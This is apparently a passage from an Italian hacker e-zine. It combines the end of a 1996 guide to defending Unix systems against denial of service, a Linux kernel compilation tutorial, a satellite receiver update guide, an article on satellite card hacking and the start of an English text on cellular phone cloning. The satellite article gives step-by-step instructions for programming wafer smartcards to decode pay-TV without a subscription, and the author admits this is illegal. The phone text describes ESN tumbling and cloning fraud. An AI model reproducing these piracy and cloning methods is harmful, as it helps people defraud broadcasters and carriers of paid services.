(2) Più di 100 argomenti sono dati con un comando eseguibile. Presente
in tutte le versioni ftpd di BSD.
.E.4. ld SOTTO SOLARIS/X86
--------------------------
Sotto Solaris 2.4/X86 ld causa un core dump se è data l'opzione -s.
.F. COME PROTEGGERE UN SISTEMA CONTRO GLI ATTACCHI DENIAL OF SERVICE?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.F.1. PROTEZIONI DI BASE
------------------------
.F.1.1. INTRODUZIONE
--------------------
Non puoi rendere il tuo sistema totalmente sicuro contro gli attacchi denial of
service ma dall'esterno puoi fare molto. Ho messo questa lista insieme e spero
che può essere di buona utilità.
.F.1.2. PATCH DI SICUREZZA
--------------------------
Installa sempre le appropriate patch di sicurezza. Non voglio inserire i numeri
delle patch, ma non importa perchè comunque devi controllare che hai tutte le
patch installate, quindi prendi una lista e controlla! Nota inoltre che le patch
cambiano nel tempo e questa è una soluzione suggerita nei notiziari di sicurezza
(es. CERT).
.F.1.3. PORT SCANNING
---------------------
Controlla quali servizi hai. Non controllare manualmente o qualche file di configurazione,
ma controlla le porte con sprobe o qualche altro port scanner. Attualmente dovresti farlo
regolarmente per vedere che nessuno abbia installato un servizio che non vuoi sul
sistema (per esempio un servizio per un sito pirata).
Disabilita ogni servizi di cui non hai bisogno, come per esempio rexd, fingerd, systat,
netstat, ruserd, sprayd, pop3, uucpd, echo, chargen, tftp, exec, ufs, daytime, time...
Ogni combinazione di echo, time, daytime e chargen è possibile per entrare in un loop.
Non c'è comunque bisogno di scartarle, così se vuoi disabilitare diventerai più sensibile
al denial of service e non l'opposto.
Attualmente i servizi possono essere trovati su molti sistemi che possono essere
usati per denial of service e brute force hacking senza nessun logging. Per esempio
Stock rexec non logga niente. La maggior parte di popd anche non loggano niente.
.F.1.4. CONTROLLA GLI ATTACCHI DALL'ESTERNO DESCRITTI IN QUESTO DOCUMENTO
-------------------------------------------------------------------------
Controlla gli attacchi descritti in questo documento e cerca la soluzione. Alcuni
attacchi dovresti eseguirli tu stesso per vedere se sono efficaci sul tuo sistema,
per esempio:
- Bloccare X-Windows.
- Uso malizioso di telnet.
- Come disabilitare i servizi.
- Kernel panic di SunOS.
- Attaccare con i clients lynx.
- Mandare in crash i sistemi con il ping di Windows.
Testa il tuo sistema con molti servizi e osserva l'effetto.
Nota che Solaris 2.4 e successivi hanno un limite sul numero di messaggi d'errore
ICMP (1 ogni 500 ms penso) e questo può causare dei problemi. Ma puoi risolvere
facilmente questo problema eseguendo questa riga:
$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0
.F.1.5. CONTROLLA GLI ATTACCHI DALL'INTERNO DESCRITTI IN QUESTO DOCUMENTO
-------------------------------------------------------------------------
Controlla gli attacchi dall'interno, sebbene è sempre possibile mandare in crash
il sistema dall'interno anche se non vuoi che sia facile. Inoltre applica molte
volte gli attacchi denial of service, per esempio:
- Bloccare il server X: Se stickybit non è settato in /tmp si
possono eseguire vari attacchi per guadagnare
l'accesso.
- Usare resolv_host_conf: Potrebbe essere usato per esporre dati
personali come /etc/shadow.
- Core dumped sotto wuftpd: Può essere usato per estrarre le password.
Se non ho messo una soluzione, ho raccomandato altri documenti. Se no non conosco un
documento con una soluzione che potevo raccomandare. In quei casi dovresti conttatare
la tua compagnia.
.F.1.6. SISTEMI DI MASSIMA SICUREZZA
------------------------------------
Pensa inoltre se potresti installare alcuni sistemi di massima sicurezza. Il sistema
di base che dovresti installare è un logdaemon e un wrapper. Un firewall può anche
essere buono, ma costoso. Gli strumenti gratuiti che possono essere scaricati da Internet
sono per esempio:
TIPO: NOME: INDIRIZZO:
LOGDAEMON NETLOG ftp://net.tamu.edu/pub/security/TAMU
WRAPPER TCP WRAPPERS ftp://cert.org/pub/tools/tcp_wrappers
FIREWALL TIS ftp://ftp.tis.com/pub/firewalls/toolkit
Nota che devi installare con cura il firewall TIS o potresti aprire nuovi buchi di
sicurezza, ma è un ottimo pacchetto se hai delle conoscenze di base.
E' anche buono rimpiazzare i servizi di cui ha bisogno, per esempio telnet, rlogin,
rsh o altro, con strumenti con ssh. Ssh è gratis e può essere trovato a:
ftp://ftp.cs.hut.fi/pub/ssh
Gli indirizzi che ho messo sono siti per la distribuzione e non penso che ne dovresti
usare altri, fatta eccezione per CERT.
Per una lista di strumenti per la sicurezza gratuiti raccomando:
"FAQ: Computer Security Frequently Asked Questions".
.F.1.7. CONTROLLARE LA SICUREZZA
--------------------------------
Inoltre controlla la sicurezza regolarmente, per esempio esaminando i log di sistema,
i files history... In ogni sistema senza altri sistemi di sicurezza alcuni strumenti
possono essere trovati. Alcuni strumenti sono:
- uptime
- showmount
- ps
- netstat
- finger
(vedi il testo del man per maggiori informazioni).
.F.1.8. MANTENERE AGGIORNATO
----------------------------
E' molto importante essere aggiornati con i problemi di sicurezza. Ricorda inoltre che
i siti, come CERT, avvisano quando il problema è già conosciuto dal pubblico "oscuro"
da qualche tempo, perciò non aspettare. Le risorse seguenti ti aiutano a mantenerti
aggiornato:
- Mailing list di CERT. Manda una email a cert@cert.org per iscriversi alla
lista
- Mailing list di Bugtraq. Manda una email a bugtraq-request@fc.net.
- Mailing list di WWW-security. Manda una email a www-security@ns2.rutgers.edu.
.F.1.9. LEGGI QUALCOSA DI MEGLIO
--------------------------------
Comincia con i documenti su Internet. Mi dispiace dire che non ci sono molti documenti
gratis disponibili, ma qui ho messo una piccola collezione.
(1) I Rainbow books sono una lunga serie di libri gratis sulla sicurezza del computer.
I cittadini degli USA possono prenderli da:
INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meader, MD 20755-600
Noi dobbiamo leggere i documenti dal web. Ogni documento non può essere trovato su internet.
(2) "Improving the security of your Unix system" di Curry è anche buono se hai bisogno
di conoscenze di base. Se non sai niente sulla sicurezza del computer non potevi trovare un
inizio migliore.
(3) "The WWW security FAQ" di Stein tratta la sicurezza W3 ed è il miglior documento che
si può trovare su internet.
(4) CERT ha pubblicato anche dei buoni documenti, come per esempio:
- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.
Penso comunque che l'ultimo documento ha tralasciato alcune cose.
(5) Per una lunga lista di documenti raccomando:
"FAQ: Computer Security Frequently Asked Questions".
(6) Vedi anche la sezione ".G. LETTURE SUGGERITE"
Potresti anche acquistare dei libri, ma non ne raccomando.
.F.2. CONTROLLARE LE PRESTAZIONI
--------------------------------
.F.2.1. INTRODUZIONE
--------------------
Ci sono molti comandi e servizi che possono essere usati per controllare le prestazioni.
Su internet si possono trovare almeno due buoni programmi gratuiti.
.F.2.2. COMANDI E SERVIZI
-------------------------
Per maggiori informazioni leggi il testo del man.
netstat Mostra lo stato della rete.
nfsstat Mostra le statistiche NFS.
sar Riporta l'attività del sistema.
vmstat Riporta le statistiche di memoria virtuale.
timex Temporizza un comando, riporta i dati dei processi e le attività di sistema.
time Temporizza un comando semplice.
truss Traccia le chiamate e i segnali di sistema.
uptime Mostra per quanto tempo il computer è stato acceso.
Nota che se un server netstat pubblico puoi usare netstat dall'esterno. netstat può
anche dare informazioni come i numeri di sequenza tcp e altro.
.F.2.3. PRGORAMMI
-----------------
Proctool: Proctool è uno strumento gratis per Solaris che controlla i processi.
ftp://opcom.sun.ca/pub/binaries/
Top: Top dovrebbe essere un programm più semplice di Proctool, ma è comunque buono.
.F.2.4. RESOCONTI
-----------------
Per controllare le prestazioni devi avere delle informazioni per un lungo periodo di
tempo. Tutti i sistemi Unix hanno dei log di resovonto per identificare quanto tempo,
CPU e memoria usa un programma. Dovresti controllare il tuo manuale per controllare
come abilitare questo servizio.
Potresti anche inventare il tuo sistema di resoconto usando contrab e uno script con
i comandi che vuoi eseguire. Fai eseguire lo script a contrab ogni giorno e controlli
le informazioni una volta a settimana. Potresti far eseguire allo script:
- netstat
- iostat -D
- vmstat
.G. LETTURE SUGGERITE
~~~~~~~~~~~~~~~~~~~~~
.F.1. INFORMAZIONI PER CONOSCENZE PIù PROFONDE
----------------------------------------------
(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.
Molti documenti in questa categoria erano degli RFC. Un RFC è un
documneto
che descrive un protocollo. Le lettere RFC stanno per Request For Comment.
Si presume che su internet si conoscano almeno quelli più comuni. Se vuoi
saperne di più su un protocollo è sempre bene leggere l'appropriato RFC.
Puoi trovare un indice sugli RFC all'indirizzo:
http://pubweb.nexor.co.uk/public/rfc/index/rfc.html
.F.2. INFORMAZIONI SULL'AGGIORNAMENTO
-------------------------------------
(1) Mailing list di CERT. Manda una email a cert@cert.org per iscriverti.
(2) Mailing list di Bugtraq. Manda una email a bugtraq-request@fc.net.
(3) Mailing list di WWW-security. Manda una email a www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Vari articoli da: - comp.security.announce
- comp.security.unix
- comp.security.firewalls
(6) Varie pubblicazioni di 40Hex.
.F.3. INFORMAZIONI DI BASE
--------------------------
(1) Husman, H. INTRODUKTION TILL DATASÄKERHET UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995.
(3) I seguenti rainbow books: - Teal Green Book (Dizionario dei
termini di sicurezza).
- Bright Orange Book( Una guida per
capire il controllo della sicurezza
nei sistemi).
- C1 Technical Report-001
(Virus per il computer: prevenzione
rivelazione e trattamento).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.
.H. COPYRIHT
------------
Questo documento è Copyright (c) 1996 by Hans Husman.
Si possono distribuire gratuitamente delle copie. Puoi distribuire, trasferire o
diffondere questo documento elettronicamente. Non puoi fingere di averlo scritto tu.
Questa notizia sui diritti deve essere mantenuta in ogni copia. Se vuoi rscrivere
l'intero documento o una parte di questo documento con un altro mezzo che non è
quello elettronico, chiedi il permesso all'autore.
.I. DISCLAIMER
--------------
Le informazioni in questo documento potrebbero cambiare senza avviso. L'uso di
queste informazioni costituiscono l'accettazione per l'uso in una condizione AS IS.
Non ci sono garanzie che riguardano queste informazioni. In ogni caso l'autore non
sarà responsabile per ogni danno che potrebbe essere collegato a questo documneto.
L'uso di queste informazioni è a rischio dell'utente.
KERNEL E COMPILAZIONE (sYn^)
Compilare il kernel: un mito da sfatare
Per gli utenti che si avventurano per la prima volta in Linux,
e che non hanno molta esperienza nella configurazione di un sistema
operativo, la ricompilazione del kernel può risultare come l'operazione
più complicata e difficile da affrontare. In realtà il timore è ben giustificato: i passi
da compiere sono molti, spesso di difficile comprensione e ci si trova a dover affrontare una
vasta gamma di opzioni (la cui effettiva utilità è dubbia o poco conosciuta) e, come se questo
non bastasse, le possibilità di insuccesso sono elevate. Eppure la compilazione del kernel
non è solo un esercizio di bravura per pochi tecnici esperti: è l'operazione che permette di
configurare Linux per il proprio hardware, ed è perciò necessaria per far funzionare le
schede sonore o un'eventuale connessione del computer in rete. Quindi? Rinunciare alle
prestazioni del computer o avventurarsi in un mondo sconosciuto?
Per fortuna con il passare del tempo il problema si è parzialmente risolto: esistono dei
programmi, spesso inclusi nelle varie distribuzioni, che automatizzano la maggior parte d
ei passi necessari, lasciando all'utente solo la facoltà di effettuare le scelte della
configurazione a lui più gradita. Perciò, chiunque, con un pò di attenzione (e di aiuto
da parte di questi programmi di configurazione!), può ricompilare tranquillamente il proprio
kernel di Linux.
Cos'è e come funziona il kernel
Kernel è una parola inglese che significa cuore: infatti esso indica il cuore
del sistema operativo, cioè la sua parte fondamentale, che ne governa e controlla il sistema.
Esso, in pratica, fornisce al resto del sistema operativo, e alle applicazioni degli utenti,
tutti i servizi relativi alla gestione dell'hardware e alle operazioni più delicate e
difficili (come per esempio la gestione della memoria). Il kernel viene caricato in memoria
al momento dell'avvio di Linux, e vi rimane per tutto il tempo in cui Linux è attivo: è
memorizzato fisicamente sull'hard disk sotto forma di file compresso, che si autodecomprime
al momento del suo caricamento in memoria. LILO non fà altro che accedere direttamente a
tale file (il cui nome è inserito nel file di configurazione) e iniziare la sua decompressione.
Il kernel di Linux provvede anche alla gestione dei vari file system, del networking,
dell'audio, dei controller dei dischi, del processore, ma anche dei set di caratteri e della
tastiera. Inoltre il kernel gestisce il caricamento dei 'moduli'.
Un 'modulo' è una porzione del kernel che si occupa di gestire uno solo degli aspetti del
sistema operativo, e viene caricato in memoria solo quando necessario, cioè al momento del
suo utilizzo. E' possibile scegliere, almeno in parte, quali parti del kernel utilizzare,
rendendo il kernel più versatile e sicuramente ottimizzato al meglio. La gestione dei moduli
(cioè il loro caricamento e il loro scarico) è affidata al kernel stesso.
Compilare il kernel significa essenzialmente prendere i file sorgenti di esso
(compresi in tutte le distribuzioni e aggiornabili poi tramite Internet), impostare il file
che contiene la configurazione desiderata, e avviare il compilatore 'gcc' (che quindi deve
essere installato correttamente); il risultato è un nuovo file contenente il kernel (diverso
da quello utilizzato fino a quel momento) utilizzabile per l'avvio (cioè un nuovo kernel, di
fatto). E' bene notare che è possibile conservare sul disco quanti file (e quindi quante
versioni del kernel) si vuole, e ognuno di essi è utilizzabile liberamente in qualsiasi
momento (per esempio tramite Lilo, che può associare un nome di avvio ad ogni diversa versione).
A cosa serve ricompilare il kernel
La prima domanda che bisogna porsi quando si pensa di ricompilare il kernel è se vale
effettivamente la pena farlo, considerando anche il fatto che Linux funziona perfettamente
con il kernel scelto in fase di 'installazione. Il kernel installato in fase di configurazione
del sistema è un kernel "standard" e serve a far funzionare Linux con tutti i componenti base
del computer (principalmente i dischi), e spesso non tiene conto di tutto l'hardware
disponibile. Perciò, se si vuole utilizzare anche altri componenti non standard (come ad
esempio la scheda audio) è necessario riconfigurare il kernel provvedendo ad includere il
supporto adatto.
Va inoltre considerato il fatto che è comunque buona norma avere il kernel configurato su
misura per il proprio sistema e per l'utilizzo che se ne vuole fare con Linux: il kernel
"standard" è configurato per gestire una grande mole di periferiche e dispositivi standard
che, spesso, sono superflui, rendendolo voluminoso in termini di memoria necessaria alla sua
esecuzione con una conseguente perdita di snellezza durante la fase del suo caricamento
all'avvio del sistema.
Le più recenti versioni del kernel (aggiornabile tramite le patch scaricabili facilmente
da Internet) permette di utilizzare a pieno il lavoro fatto dagli sviluppatori per rendere
Linux un sistema sicuro, affidabile e stabile in ogni situazione, facilitando e rendendo il
proprio lavoro più sicuro (anche se, implicitamente, in condizioni normali tale differenza
non si avverte con facilità).
La procedura
La ricompilazione del kernel prevede 4 passi fondamentali a cui è necessario attenersi,
dopo essersi connessi al sistema come root.
Prima di avviare tale procedura, però, è necessario che i file sorgenti del kernel
siano installati correttamente sul disco e siano aggiornati. Per questo, basta decomprimere
il file che li contiene (nella directory '/usr/src'; la decompressione creerà la
sottodirectory chiamata 'linux' o in modo simile) oppure applicare le patch
(con il comando patch; se si devono applicare più patch, bisogna farlo rigorosamente
nell'ordine crescente di versione).
Il primo passo consiste nell'aggiornamento (o nella creazione, se è la prima volta che lo si
fà) del file di configurazione del kernel. Per eseguire tale operazione digitare al prompt
dei comandi la seguente istruzione:
make config
Se la distribuzione usata comprende un programma che aiuta nella compilazione del kernel,
è probabile che tale comando sia eseguito automaticamente, altrimenti è necessario digitarlo
al prompt. In entrambi i casi si effettuano tutte le scelte che compongono la configurazione
(attenzione: sono veramente tante e dovete avere pazienza e non spaventarsi). E' questo il
momento di utilizzare a pieno la possibilità di multitasking di Linux: se non si capisce
qualcosa si può cercare di utilizzare, senza interrompere il processo di configurazione,
la documentazione on-line di Linux, avviando gli appositi programmi di ricerca e
visualizzazione (con una particolare attenzione agli HowTo).
I successivi comandi possono essere digitati insieme o separatamente (semprechè non siano
eseguiti automaticamente dal programma):
make dep;
make clean;
make zImage
Il primo di essi crea le dipendenze tra i file, il secondo cancella i file "vecchi" ed
il terzo avvia la compilazione vera e propria del kernel.
Il processo di compilazione necessita, a seconda della velocità del computer su cui stiamo
lavorando, di un tempo variabile tra i due minuti a circa mezz'ora e che è, comunque, sempre
possibile eseguire come processo in background. Al termine di tale operazione il nuovo file
si troverà nella directory '/usr/src/linux/arch/i386/boot' con il nome 'zImage'; tale file va
copiato nella root directory (eventualmente rinominandolo) e successivamente si deve procedere
all'aggiornamento di LILO, il file batch di Loadlin, il floppy di boot, etc (altrimenti il
sistema non sarà mai avviato).
Precauzioni
Anche se con i potenti programmi citati le probabilità di avere un kernel non funzionante
diminuiscono, non è possibile escludere completamente tale eventualità e, inoltre, un errore
nelle scelta della configurazione piò causare la generazione di un kernel funzionante ma privo
di qualche componente fondamentale per il nostro sistema (consentendo quindi al sistema di
lanciare il kernel ma risulta impossibile riuscire ad eseguire le operazioni richieste, prima
fra tutte il riavvio della procedura di ricompilazione). Per evitare tutti questi problemi,
basta prendere alcuni accorgimenti.
La cosa più semplice da fare è conservare il kernel (funzionante) che precendentemente era
installato nel sistema (basta non sovrascriverlo quando si copia il nuovo kernel nella root
directory) e aggiungere (non sostituire!) a Lilo una nuova configurazione di partenza facendo
riferimento al nuovo kernel, in modo da poterlo provare. Quando si è sicuri che tutto funziona
correttamentel, si aggiorna definitivamente Lilo (ma ancora una volta è possibile tenere due
o più diverse configurazioni con diversi kernel).
A questo punto, si può anche creare un floppy di boot con il nuovo kernel, in considerazione
del fatto che esso serve solo per le situazioni di emergenza, si può anche mantenere quello
vecchio, che comunque ci assicura il suo perfetto funzionamento anche se con un kernel
differente.
Inoltre, se si utilizza Loadlin in Dos (o con Windows 95/98), si può copiare il nuovo kernel
nella directory di Loadlin e poi aggiornare il file batch di avvio (oppure si può scriverne
un'altro, ovviamente con un altro nome, che utilizzi il nuovo kernel, conservando sempre
quello vecchio).
Problemi
Uno dei problemi che si verifica con maggiore frequenza é quello relativo aggiornamento di
LILO con la configurazione del nuovo kernel, impedendo all'installazione di proseguire
visualizzando il seguente messaggio: "Kernel too big!".
Le cause di tale messaggio di errore sono due: o ci si è sbagliati nel copiare il file del
kernel, cioè si è preso per tale un file diverso (capita: nelle directory del kernel si creano
diversi file di nome 'vmlinux', che assomiglia tanto al 'vmlinuz' del kernel originario),
oppure la configurazione scelta comprende effettivamente troppi elementi.
Nel primo caso bisogna trovare il file giusto (il nome è 'zImage', e se se ne visualizzano le
proprietà, il tipo di file è 'Linux kernel 2.0.xx' o simile) e copiarlo, eventualmente
procedendo a rinominarlo, nella root directory.
Nel secondo caso bisogna ripetere le operazioni di compilazione, ovviamente cambiando i
parametri della configurazione: tanto per incominciare possiamo procedere a togliendo gli
elementi che non ci servono e, successivamente, procedendo alla compilazione dei moduli di
tutti gli elementi possibili (ovviamente va abilitata, se già non lo si era fatto, la
funzione di gestione dei moduli). A questo proposito, va considerato che gli elementi che non
possono essere compilati come moduli sono pochissimi e, cioè:
le parti di gestione del file system di Linux (ext2);
le parti riguardanti i controller EIDE e/o SCSI;
la gestione dei moduli;
il supporto per file binari di tipo ELF.
Tutto il resto può essere (anzi, è meglio che lo sia effettivamente) compilato come modulo.
In alternativa, se è veramente necessario avere un kernel con tutti i componenti linkati in
modo statico, si può provare ad avviare la compilazione usando il comando:
make bzImage
invece di
make zImage.
Il secondo problema più ricorrente è che il kernel, così compilato, si rifiuta di essere
eseguito, oppure che non funzioni seguendo le impostazioni da noi definite. In questo caso
bisogna armarsi di pazienza e cercare di capire qual è effettivamente il problema alla base
(facendo largo uso di documentazione cartacea ed elettronica), per poi ripetere la tale
procedura, fino ad ottenere il risultato voluto.
Una terza possibilità legata ad un'insuccesso riguarda invece il fallimento della procedura
di configurazione e compilazione, con messaggi di vario tipo. Spesso i messaggi dicono che
il sistema non trova i files necessari alla compilazione: in questi caso va verificata la
corretta installazione di tutti i file sorgente del kernel e procurarsi quelli mancanti (in
certi casi è meglio scaricarsi da Internet il file completo con tutti i sorgenti: la
dimensione è intorno ai 7 MB). Se il problema è di altro tipo, è bene ricorrere alla
documentazione di Linux e ai propri manuali dell'hardware.
Personalizzazione del kernel
Poiché Linux è distribuito secondo la licenza GNU, ogni utente è libero di modificare a
proprio piacimento i sorgenti del kernel. Così facendo, è possibile creare un kernel
personale, unico al mondo, ed eventulamente procedere anche alla sua distribuzione
(secondo le regole dettate dalla licenza di Linux).
Questa operazione, su cui si basa tutta la scrittura e diffusione di Linux a livello
globale, necessita però di una grande cura e di un'attenzione particolare. Infatti,
oltre ad essere esperti programmatori, le possibilità di avere un sistema non funzionante
aumentano enormemente, portando al sorgere di problemi legati ad errori di programmazione
che possono anche portare a veri e propri disastri (come per esempio la cancellazione
dell'intero disco fisso, partizioni Dos comprese).
Ecco perché è sconsigliabile avventurarsi in questa operazione, a meno di non essere in grado
di minimizzare tali rischi, oppure chiedendo aiuto ad un'amico esperto: inutile dire che se
invece l'operazione va a buon fine e tutto funziona egregiamente, la soddisfazione ripaga
ampiamente le difficoltà affrontate!
0===Ooo===oOOo===ooO===0===Ooo==--=Hacking satellitare=--====ooO===0===Ooo===oOOo===
SEMPLICE PROGRAMMAZIONE DI UNA WAFER CARD
Innanzitutto voglio dirvi che codificare le trasmissioni senza un abbonamento originale
è puramente illegale,lo so' che i prezzi sono alti ma questa è la legge!!Ma a noi non
importa niente la legge vero?? fALSo.(non vi incito!)
Allora le smartcard complete potete acquistarle in qualsiasi negozio di satelliti e
materiale elettonico ,le trovate anche di diversi colori.Avete inteso un po' quale sono
le smart?Quelle con gli spazi per mettere l'eeprom e il pic ,rispettivamente i chip che
hanno 8 e 18 piedini, Quelle che si mettono nel decoder PRATICAMENTE,e senza di esse i
canali non li potrai vedere(non pensare subito alla pornografia!)!!
Prima di iniziare a programmare, dovete assolutamente procurarvi i file .hex e .bin
aggiornati, li trovate nei siti come www.ilcovo.net ,ma di ultimo questo è stato oscurato
quindi sta a voi cercarli... ,,, ps provate www.oozsat.com !
Questi file verranno caricati sui chip che prima ho citato tramite il programmatore
(hardware) e il programma pic24c13 (software).
Il programma parte con MS-dOS ,scritto in C++ della Borland.
Allora attaccato il Ludipipo cioè il programmatore, alla porta com e inserita la smartmouse
nella card fate partire il programma.
Andiamo in options e impostiamo LudiPipo e la com a cui è collegato, nella finestra STATUS
le selezioni effettuate interface e port appaiono a ogni cambiamento.Poi vai su Device e
scegli 16F84 per il PIC e 24C16 per la EEPROM .
Estraete il PIC16F84 dalla vostra WaferCard. Il PIC16F84 è il chip più grosso. Per estrarlo
potete utilizzare una pinza apposita oppure con un piccolo cacciavite facendo molta
attenzione a non piegare i piedini o dovrete faticare a raddrizzarli.
Se dei programmanre il PIC 16F84 dovrai caricare il file .HEX, che si occupa di aggiornare
la EEprom tramite CAM satellitare.Dopo che avrai selezionato quest'ultimo ti apparira' una
finestra "PIC conf status" dove si trovano i fuses !ù
Se dovete codificare Irdeto inserite:
CODEPROTECT : NO
POWERUPTIMER : YES
WATCHDOGTIMER : NO
OSCILLATORTYP : XT
se invece dovete codificare Seca :
CODEPROTECT : NO
POWERUPTIMER : NO
WATCHDOGTIMER : NO
OSCILLATORTYP : XT
oppure :
CODEPROTECT : NO
POWERUPTIMER : NO
WATCHDOGTIMER : NO
OSCILLATORTYP : HS
(pero' consiglio la prima).
Fatto tutto vai su Action e scegli program, il programma iniziera' a programmare, se
tutto andra' a buon fine non vi dovete trovare errori alla fine.
Per la EEPROM dovrete invece caricare i .BIN con l'apposita opzione : LoadBIN
A questo punto avete la vostra WaferCard aggiornata con gli ultimi files che vi permetteranno
di vedere a sbafo un bel pò di cosette. Se pacchetti tipo Stream o Tele+ non funzionano ancora
lasciate la Wafer nel ricevitore su un canale del pacchetto e aspettate che riceva le nuove
chiavi di decodifica. Se proprio non ne vuole sapere di funzionare provate con qualche altro
files dai siti già elencati.
ATTENZIONE:: non venitemi a dire non vedo le partite o la Pay per view peche se avete la
codifica Irdeto e ovvio che non le prendete!!!
SPIEGAZIONE DEI FUSES.:
ü 1. gli OscType (Oscillatori o Clock) sono 4 e sono: RC, XT, LP e HS ogni invio o
click variano. I comandi selezionano la modalità di funzionamento dell'amplificatore
interno al pic sull'ingresso del clock.
Ø RC significa oscillatore esterno formato solo da una rete Resistenza Condensatore.
Non va bene nel nostro caso poiché il clock proviene dal decoder ed esso non è formato
da un rete RC.
Ø XT significa oscillatore a quarzo esterno, la frequenza è nel mezzo dei valori
accettati dal pic, il guadagno dell'amplificatore interno è medio. E' il valore che va bene.
In tale maniera la corrente assorbita dal pic sulla porta clock è tale da non danneggiare il
decoder.
Ø LP significa Low Power. Sempre quarzo esterno ma con basso assorbimento e basse
frequenze. Non va bene nel nostro caso perché la frequenza è più alta.
Ø HS significa High Gain ovvero alto assorbimento e frequenze elevate. Non va bene,
si rischia di danneggiare il decoder chiedendogli troppa corrente.
ü 2. PowerUpTimer: introduce un ritardo nello start del programma permettendo all'
alimentazione di stabilizzarsi. E' quello che fa per noi. Evita che il pic si avvii con
l'alimentazione non regimata e quindi sbagli lo start del programma.
ü 3. WatchDogTimer viene utilizzato per resettare il pic dopo averlo messo in sleep
mode. Tale modalità non viene utilizzata per cui va posto a off.
ü 4. CodeProtect serve a non permettere la lettura del contenuto della memoria flash
del pic. Quella che contiene il programma. Porre tale comando on è roba da commercianti.
Pubblicato su "Chip".
Grazie all
sYn^]|[ <--- syn@hackersat.com ><--- synarckio1@yahoo.it --->
<---------- w w w . h a c k e r s a t . x s 3 . c o m --------->
ISTRUZIONI PER L'AGGIORNAMENTO DEL RICEVITORE HUMAX IRCI-5400
Per effettuare l'aggiornamento sono necessari:
- software WDN4OAK
- file *.hdf (NB verificare la versione del proprio loader (L o H) e scricare il file apposito)
- cavo seriale femmina/femmina null modem semplificato in base al seguente schemino
Pin ricev. Pin PC
---------- ------
2 <--------> 3
3 <--------> 2
5 <--------> 5
Se preparate il cavo da soli verificate che non ci siano
pin in corto.
Durante l'operazione, per precauzione,
- togliere la smart card e le eventuali cam
- chiudere ogni programma in esecuzione in background (es.antivirus)
1) tenendo il 5400 in posozone si stand-by, attaccare il pc al ricevitore con il cavo null-modem;
2) Avviare il programma WDN4OAK, impostate la porta COM, il collegamento
a 115.200 bps, selezionate il file (*.hdf);
4) Cliccare su GO e accendere il ricevitore da telecomando
Se tutto e' andato bene iniziera' subito il download (il cui avanzamento è indicato da un mumero progressivo sul display).
Se il download non parte nel giro di 2-3 secondi potete cliccare pure su STOP perche' c'e' qualcosa che non e' andato bene.
Provate a diminuire progressivamente la velocita' di collegamento,
cioe' fate delle prove con tutte le velocita' riportate:
115.200
57.600
38.400
19.200
9.600
Attenzione all'alimentazione, il pericolo durante queste operazioni e' che parta la corrente ed allora sarebbero veramente dei problemi.
===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Phreaking=--====ooO===0===Ooo===oOOo===ooO===0===
CELLULAR TELEPHONE ESN EMULATION
--------------------------------
The term "Emulation" is used to describe the process of making two, or
more, phones look alike to the cellular system. A basic understanding of
the terms NAM and ESN is required before proceeding.
NAM or "Number Allocation Module" is the term used to describe a cellular
telephone's dealer programmable system parameters. These parameters
include the users telephone number and other settings required to identify
the phone to the cellular system. Older phones use an PROM chip that has
to be programed or "burnt" using an PROM programmer. On all newer phones
the NAM information can be re-programed at will from the handset be anyone
possessing the relevant programing instructions, and in some cases a
programming or "password" adaptor.
ESN or "Electronic Serial Number" is the term used to describe a cellular
telephones "un-alterable" fingerprint and is programed into the phone by
the manufacturer. The ESN is commonly expressed as an eleven digit decimal,
or eight digit hex number. The decimal format includes a three digit
manufacturers identification and an eight digit unique serial number, the
hex format includes a two digit manufacturers identification and a six digit
unique serial number.
When combined the NAM and ESN provide the cellular carriers a way of
identifying the phone and determining whether to allow the phone to place a
call. Whenever the phone is used it transmits this information to the
cellular switch where it is compared to a data base of current subscribers.
If the system recognizes the phone as being an out of area, or "roaming",
subscriber a check is made with the home system. This check is either made
during the first call, or more commonly these days before the first call
is completed.
CELLULAR FRAUD
--------------
In the past it was often possible for hackers to change the ESN and NAM
information and make one call before the system locked the unit out.
The NAM and ESN information would be changed and another call could be
completed. This is known as ESN "Tumbling" and over the last few years
the Cellular Carriers have lost millions of dollars to this scam. It
has been estimated that at the height of tumbling in New York City up to
30% of calls placed were fraudulent.
To change the ESN the hacker would generally remove the phone's ESN chip
and install a socket to take an easily reprogramable EPROM chip, the ESN
could then be reprogramed at will. More recently people have reverse
engineered certain manufacturer's software to allow simple reprograming
using a lap top computer connected to the phone's data port.
The Cellular industry has reacted to this in various ways. Initially the
simple way to prevent tumbling was to ban all roaming customers from direct
dialing, legitimate callers had to pre-register using a credit card to
guarantee payment. Newer advanced software allows pre-screening of
callers information and has now all but eliminated tumbling. In most
service areas the ESN and NAM information is checked on power up or as soon
as the SEND button is pressed, prior to allowing the completion of the call.
The Cellular hackers have now turned to other ways of making fraudulent
calls. The most common of these is to obtain a legitimate subscriber's
telephone number and ESN and re-program a phone with this information,
therefore making an exact clone able to make (and receive) phone calls.
This method allows anything from a few days to a full month of "free"
calls, and can go on indefinitely if the cloned number is a corporate
account as executive's phone bills are rarely questioned.
LEGAL EMULATION
---------------
